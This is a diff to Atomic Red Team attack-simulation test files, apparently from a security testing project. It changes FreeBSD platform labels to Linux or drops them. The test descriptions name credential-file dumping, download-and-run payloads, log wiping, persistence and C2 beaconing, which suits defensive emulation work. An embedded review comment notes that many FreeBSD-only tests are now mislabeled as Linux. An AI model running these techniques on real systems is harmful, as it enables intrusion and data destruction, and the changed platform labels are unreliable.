+32015,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -32063,7 +32039,6 @@ execution: Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. supported_platforms: - - linux:freebsd - linux - macos executor: @@ -35452,9 +35427,8 @@ persistence: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute 
@@ -36503,7 +36477,6 @@ persistence:
 description: Turn on Chrome/Chromium developer mode and Load Extension found in the src directory
 supported_platforms:
- - linux:freebsd
 - linux
 - windows
 - macos
@@ -36521,7 +36494,6 @@ persistence:
 auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
 description: Install the "Minimum Viable Malicious Extension" Chrome extension
 supported_platforms:
- - linux:freebsd
 - linux
 - windows
 - macos
@@ -36538,7 +36510,6 @@ persistence:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - windows
 - macos
@@ -39368,9 +39339,8 @@ persistence:
 persistence on victim host. \nIf the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.\n"
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 executor:
 name: sh
 elevation_required: false
@@ -48279,7 +48249,6 @@ command-and-control:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -48860,7 +48829,6 @@ command-and-control:
 This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -48949,7 +48917,6 @@ command-and-control:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -48989,7 +48956,6 @@ command-and-control:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -49028,7 +48994,6 @@ command-and-control:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -49059,7 +49024,6 @@ command-and-control:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -49090,7 +49054,6 @@ command-and-control:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -49121,7 +49084,6 @@ command-and-control:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -49152,7 +49114,6 @@ command-and-control:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -49342,9 +49303,8 @@ command-and-control:
 Note that this test may conflict with pre-existing system configuration.
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 input_arguments:
 proxy_server:
 description: Proxy server URL (host:port)
@@ -49703,7 +49663,6 @@ collection:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -49733,7 +49692,6 @@ collection:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -49770,9 +49728,8 @@ collection:
 '
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 input_arguments:
 test_folder:
 description: Path used to store files.
@@ -57401,9 +57358,8 @@ credential-access:
 '
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 input_arguments:
 search_path:
 description: Path where to start searching from.
@@ -58320,7 +58276,6 @@ credential-access:
 '
 supported_platforms:
- - linux:freebsd
 - macos
 - linux
 input_arguments:
@@ -58350,9 +58305,8 @@ credential-access:
 '
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 input_arguments:
 file_path:
 description: Path to search
@@ -58370,9 +58324,8 @@ credential-access:
 '
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 input_arguments:
 file_path:
 description: Path to search
@@ -60879,7 +60832,6 @@ discovery:
 Upon successful execution, sh will stdout list of usernames.
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 executor:
@@ -61419,7 +61371,6 @@ discovery:
 auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
 description: "(requires root)\n"
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -61443,7 +61394,6 @@ discovery:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -61466,7 +61416,6 @@ discovery:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 executor:
@@ -61491,7 +61440,6 @@ discovery:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 executor:
@@ -62144,7 +62092,6 @@ discovery:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -62169,7 +62116,6 @@ discovery:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 executor:
@@ -62184,9 +62130,8 @@ discovery:
 '
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 executor:
 command: 'env
@@ -63010,9 +62955,8 @@ discovery:
 https://perishablepress.com/list-files-folders-recursively-terminal/
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 input_arguments:
 output_file:
 description: Output file used to store the results.
@@ -63038,9 +62982,8 @@ discovery:
 '
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 input_arguments:
 output_file:
 description: Output file used to store the results.
@@ -63143,7 +63086,6 @@ discovery:
 Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 dependency_executor_name: sh
@@ -63427,7 +63369,6 @@ discovery:
 Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -63579,9 +63520,8 @@ discovery:
 '
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 executor:
 command: |
 if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
@@ -64099,7 +64039,6 @@ discovery:
 Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 dependency_executor_name: sh
@@ -64125,7 +64064,6 @@ discovery:
 Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -64559,7 +64497,7 @@ discovery:
 description: "Identify system time. Upon execution, the local computer system time and timezone will be displayed. \n"
 supported_platforms:
- - linux:freebsd
+ - linux
 - macos
 executor:
 command: 'date
@@ -71126,9 +71064,8 @@ impact:
 This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break.
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 executor:
 command: 'yes > /dev/null
@@ -71291,7 +71228,6 @@ impact:
 Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C.
 supported_platforms:
- - linux:freebsd
 - linux
 - macos
 input_arguments:
@@ -71690,9 +71626,8 @@ impact:
 '
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 input_arguments:
 timeout:
 description: Time to restart (can be minutes or specific time)
@@ -71710,9 +71645,8 @@ impact:
 '
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 input_arguments:
 timeout:
 description: Time to shutdown (can be minutes or specific time)
@@ -71730,9 +71664,8 @@ impact:
 '
 supported_platforms:
- - linux:freebsd
- - macos
 - linux
+ - macos
 executor:
 command: 'reboot
@@ -73844,7 +73777,6 @@ exfiltration:
 supported_platforms:
 - macos
 - linux
- - linux:freebsd
 input_arguments:
 input_file:
 description: Test file to upload
@@ -74001,7 +73933,6 @@ exfiltration:
 supported_platforms:
 - macos
 - linux
- - linux:freebsd
 input_arguments:
 domain:
 description: target SSH domain
@@ -74023,7 +73954,6 @@ exfiltration:
 supported_platforms:
 - macos
 - linux
- - linux:freebsd
 input_arguments:
 user_name:
 description: username for domain
@@ -74283,7 +74213,6 @@ exfiltration:
 supported_platforms:
 - macos
 - linux
- - linux:freebsd
 input_arguments:
 file_name:
 description: File name
@@ -74567,7 +74496,6 @@ exfiltration:
 supported_platforms:
 - macos
 - linux
- - linux:freebsd
 executor:
 steps: |
 1. Victim System Configuration:
diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml
index 92756f8503..141cfe6858 100644
--- a/atomics/Indexes/windows-index.yaml
+++ b/atomics/Indexes/windows-index.yaml
@@ -51018,7 +51018,6 @@ persistence:
 description: Turn on Chrome/Chromium developer mode and Load Extension found in the src directory
 supported_platforms:
- - linux:freebsd
 - linux
 - windows
 - macos
@@ -51036,7 +51035,6 @@ persistence:
 auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
 description: Install the "Minimum Viable Malicious Extension" Chrome extension
 supported_platforms:
- - linux:freebsd
 - linux
 - windows
 - macos
@@ -51053,7 +51051,6 @@ persistence:
 '
 supported_platforms:
- - linux:freebsd
 - linux
 - windows
 - macos
diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md
index b73b3e0075..2e8353d5c5 100644
--- a/atomics/T1003.007/T1003.007.md
+++ b/atomics/T1003.007/T1003.007.md
@@ -85,7 +85,7 @@ Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities
 copy process memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** fa37b633-e097-4415-b2b8-c5bf4c86e423
@@ -146,7 +146,7 @@ Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script
 copy a process's heap memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted.
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md
index a064a0d67b..b184d2530b 100644
--- a/atomics/T1003.008/T1003.008.md
+++ b/atomics/T1003.008/T1003.008.md
@@ -61,7 +61,7 @@ rm -f #{output_file}
 ## Atomic Test #2 - Access /etc/master.passwd (Local) /etc/master.passwd file is accessed in FreeBSD environments
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 5076874f-a8e6-4077-8ace-9e5ab54114a5
@@ -99,7 +99,7 @@ rm -f #{output_file}
 ## Atomic Test #3 - Access /etc/passwd (Local) /etc/passwd file is accessed in FreeBSD and Linux environments
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
@@ -137,7 +137,7 @@ rm -f #{output_file}
 ## Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** df1a55ae-019d-4120-bc35-94f4bc5c4b0a
@@ -174,7 +174,7 @@ rm -f #{output_file}
 ## Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** f5aa6543-6cb2-4fae-b9c2-b96e14721713
diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md
index f9eaa6749b..a2c8d9112c 100644
--- a/atomics/T1007/T1007.md
+++ b/atomics/T1007/T1007.md
@@ -119,7 +119,7 @@ systemctl --type=service
 ## Atomic Test #4 - System Service Discovery - service Enumerates system service using service
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** b2e1c734-7336-40f9-b970-b04731cbaf8a
diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md
index 624f633f21..aca4dd507b 100644
--- a/atomics/T1016/T1016.md
+++ b/atomics/T1016/T1016.md
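Review bot: The new line `+**Supported Platforms:** Linux` in the first hunk (Atomic Test #2, "Access /etc/master.passwd") contradicts the test's own description, which says the file is accessed in FreeBSD environments; /etc/master.passwd is not a Linux file, so a runner that selects atomics by platform would now schedule a FreeBSD-only test on Linux hosts. The same Freebsd-to-Linux relabeling is applied to other FreeBSD-specific tests further down, most seriously T1070.004 Atomic Test #9 ("Delete Filesystem - FreeBSD", the `rm -rf /` test), which now advertises Linux as a supported platform while its text says it deletes the root filesystem of a FreeBSD system. Since these .md files and the index YAML are generated, the defect presumably sits in the source platform mapping (the linux-index.yaml hunks drop `linux:freebsd` rather than map it to a FreeBSD platform), so the fix belongs there rather than in the generated docs; a maintainer should confirm before merging. Until then, a short note in each affected test description such as `FreeBSD-only; platform label pending generator fix` would keep users from running these on Linux by accident.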
@@ -145,7 +145,7 @@ Identify network configuration information.
 Upon successful execution, sh will spawn multiple commands and output will be via stdout.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 7625b978-4efd-47de-8744-add270374bee
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index ef3bd8d121..b3cd1ceea3 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -222,7 +222,7 @@ Identify remote systems via arp.
 Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
@@ -264,7 +264,7 @@ Identify remote systems via ping sweep.
 Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
@@ -565,7 +565,7 @@ apt-get install iproute2 -y
 ## Atomic Test #14 - Remote System Discovery - netstat Use the netstat command to display the kernels routing tables.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** d2791d72-b67f-4615-814f-ec824a91f514
diff --git a/atomics/T1027.001/T1027.001.md b/atomics/T1027.001/T1027.001.md
index a0612fdf73..8f5a78af4d 100644
--- a/atomics/T1027.001/T1027.001.md
+++ b/atomics/T1027.001/T1027.001.md
@@ -18,7 +18,7 @@ Uses dd to add a zero byte, high-quality random data, and low-quality random dat
 Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
-**Supported Platforms:** Freebsd, macOS, Linux
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
@@ -71,7 +71,7 @@ Uses truncate to add a byte to the binary to change the hash.
 Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
-**Supported Platforms:** Freebsd, macOS, Linux
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** e22a9e89-69c7-410f-a473-e6c212cd2292
diff --git a/atomics/T1027.004/T1027.004.md b/atomics/T1027.004/T1027.004.md
index 7d8432dd55..ea1367cde0 100644
--- a/atomics/T1027.004/T1027.004.md
+++ b/atomics/T1027.004/T1027.004.md
@@ -122,7 +122,7 @@ Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atom
 ## Atomic Test #3 - C compile Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** d0377aa6-850a-42b2-95f0-de558d80be57
@@ -168,7 +168,7 @@ wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004
 ## Atomic Test #4 - CC compile Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** da97bb11-d6d0-4fc1-b445-e443d1346efe
@@ -214,7 +214,7 @@ wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004
 ## Atomic Test #5 - Go compile Compile a go file with golang on FreeBSD, Linux or Macos.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 78bd3fa7-773c-449e-a978-dc1f1500bc52
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 681b6e3e9f..733ea6fb82 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -96,7 +96,7 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip
 Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team` and uname -v
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 197ed693-08e6-4958-bfd8-5974e291be6c
diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md
index 2f1eaf4a60..70806f0713 100644
--- a/atomics/T1030/T1030.md
+++ b/atomics/T1030/T1030.md
@@ -12,7 +12,7 @@
 ## Atomic Test #1 - Data Transfer Size Limits Take a file/directory, split it into 5Mb chunks
-**Supported Platforms:** macOS, Linux, Freebsd
+**Supported Platforms:** macOS, Linux
 **auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a
diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md
index c022c18532..e7487bfb61 100644
--- a/atomics/T1033/T1033.md
+++ b/atomics/T1033/T1033.md
@@ -71,7 +71,7 @@ Identify System owner or users on an endpoint
 Upon successful execution, sh will stdout list of usernames.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c
diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md
index fa44abf3fd..a0e6d423a6 100644
--- a/atomics/T1036.003/T1036.003.md
+++ b/atomics/T1036.003/T1036.003.md
@@ -65,7 +65,7 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro
 Upon successful execution, sh is renamed to `crond` and executed.
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556
diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md
index 5f0fccd118..a368e6f101 100644
--- a/atomics/T1036.005/T1036.005.md
+++ b/atomics/T1036.005/T1036.005.md
@@ -16,7 +16,7 @@ Adversaries may also use the same icon of the file they are trying to mimic.cron in Linux or Unix environments to execute
 ## Atomic Test #1 - Cron - Replace crontab with referenced file This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
-**Supported Platforms:** Freebsd, macOS, Linux
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75
@@ -103,7 +103,7 @@ rm /etc/cron.weekly/#{cron_script_name}
 ## Atomic Test #3 - Cron - Add script to /etc/cron.d folder This test adds a script to /etc/cron.d folder configured to execute on a schedule.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 078e69eb-d9fb-450e-b9d0-2e118217c846
diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md
index d27ab7796e..504d424539 100644
--- a/atomics/T1056.001/T1056.001.md
+++ b/atomics/T1056.001/T1056.001.md
@@ -194,7 +194,7 @@ There are several variables that can be set to control the appearance of the bas
 To gain persistence the command could be added to the users .shrc or .profile
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** b04284dc-3bd9-4840-8d21-61b8d31c99f2
@@ -243,7 +243,7 @@ When a command is executed in bash, the BASH_COMMAND variable contains that comm
 To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 7f85a946-a0ea-48aa-b6ac-8ff539278258
diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md
index f45a48cf9d..1afa1c4095 100644
--- a/atomics/T1057/T1057.md
+++ b/atomics/T1057/T1057.md
@@ -28,7 +28,7 @@ Utilize ps to identify processes.
 Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc
diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md
index 38842c113b..9f99e7c698 100644
--- a/atomics/T1059.004/T1059.004.md
+++ b/atomics/T1059.004/T1059.004.md
@@ -48,7 +48,7 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
 ## Atomic Test #1 - Create and Execute Bash Shell Script Creates and executes a simple sh script.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
@@ -90,7 +90,7 @@ Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is gen
 Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c
@@ -225,7 +225,7 @@ curl --create-dirs #{linenum_url} --output #{linenum}
 ## Atomic Test #5 - New script file in the tmp directory An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed.
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 8cd1947b-4a54-41fb-b5ea-07d0ace04f81
@@ -260,7 +260,7 @@ unset TMPFILE
 ## Atomic Test #6 - What shell is running An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 7b38e5cc-47be-44f0-a425-390305c76c17
@@ -290,7 +290,7 @@ if $(printenv SHELL >/dev/null); then printenv SHELL; fi
 ## Atomic Test #7 - What shells are available An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** bf23c7dc-1004-4949-8262-4c1d1ef87702
@@ -318,7 +318,7 @@ cat /etc/shells
 ## Atomic Test #8 - Command line scripts An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** b04ed73c-7d43-4dc8-b563-a2fc595cba1a
@@ -377,7 +377,7 @@ unset ART
 ## Atomic Test #10 - Obfuscated command line scripts (freebsd) An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 5dc1d9dd-f396-4420-b985-32b1c4f79062
@@ -455,7 +455,7 @@ echo "Automated installer not implemented yet, please install chsh manually"
 ## Atomic Test #12 - Change login shell (freebsd) An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 33b68b9b-4988-4caf-9600-31b7bf04227c
@@ -535,7 +535,7 @@ unset ART
 ## Atomic Test #14 - Environment variable scripts (freebsd) An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 663b205d-2121-48a3-a6f9-8c9d4d87dfee
@@ -622,7 +622,7 @@ apt update && apt install -y curl
 ## Atomic Test #16 - Detecting pipe-to-shell (freebsd) An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 1a06b1ec-0cca-49db-a222-3ebb6ef25632
diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md
index 16af50ffc2..49ab1de237 100644
--- a/atomics/T1059.006/T1059.006.md
+++ b/atomics/T1059.006/T1059.006.md
@@ -20,7 +20,7 @@ Python comes with many built-in packages to interact with the underlying system,
 ## Atomic Test #1 - Execute shell script via python's command mode arguement Download and execute shell script and write to file then execute locally using Python -c (command mode)
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
@@ -74,7 +74,7 @@ pip install requests
 ## Atomic Test #2 - Execute Python via scripts Create Python file (.py) that downloads and executes shell script via executor arguments
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
@@ -139,7 +139,7 @@ pip install requests
 ## Atomic Test #3 - Execute Python via Python executables Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
@@ -206,7 +206,7 @@ pip install requests
 ## Atomic Test #4 - Python pty module and spawn function used to spawn sh or bash Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
-**Supported Platforms:** Freebsd, Linux
+**Supported Platforms:** Linux
 **auto_generated_guid:** 161d694c-b543-4434-85c3-c3a433e33792
diff --git a/atomics/T1069.001/T1069.001.md b/atomics/T1069.001/T1069.001.md
index 13b8e5d9fb..1ba4e51843 100644
--- a/atomics/T1069.001/T1069.001.md
+++ b/atomics/T1069.001/T1069.001.md
@@ -26,7 +26,7 @@ Commands such as net localgroup of the [Net](https://attack.mitre.o
 ## Atomic Test #1 - Permission Groups Discovery (Local) Permission Groups Discovery
-**Supported Platforms:** Freebsd, macOS, Linux
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae
diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md
index 53856c9db4..df68871308 100644
--- a/atomics/T1070.002/T1070.002.md
+++ b/atomics/T1070.002/T1070.002.md
@@ -107,7 +107,7 @@ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
 ## Atomic Test #2 - rm -rf Delete messages and security logs
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** bd8ccc45-d632-481e-b7cf-c467627d68f9
@@ -211,7 +211,7 @@ touch #{system_log_path}
 ## Atomic Test #5 - Truncate system log files via truncate utility (freebsd) This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 14033063-ee04-4eaf-8f5d-ba07ca7a097c
@@ -286,7 +286,7 @@ touch #{system_log_path}
 ## Atomic Test #7 - Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 369878c6-fb04-48d6-8fc2-da9d97b3e054
@@ -397,7 +397,7 @@ sudo echo '' > #{system_log_path}
 ## Atomic Test #10 - Overwrite FreeBSD system log via echo utility This test overwrites the contents of system log file with an empty string using echo utility
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 11cb8ee1-97fb-4960-8587-69b8388ee9d9
@@ -498,7 +498,7 @@ touch #{system_log_path}
 ## Atomic Test #13 - Delete system log files via unlink utility (freebsd) This test deletes the messages log file using unlink utility
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2
diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md
index 53d506e9f0..2870812d32 100644
--- a/atomics/T1070.003/T1070.003.md
+++ b/atomics/T1070.003/T1070.003.md
@@ -88,7 +88,7 @@ rm ~/.bash_history
 ## Atomic Test #2 - Clear sh history (rm) Clears sh history via rm
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 448893f8-1d5d-4ae2-9017-7fcd73a7e100
@@ -144,7 +144,7 @@ echo "" > ~/.bash_history
 ## Atomic Test #4 - Clear sh history (echo) Clears sh history via echo
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
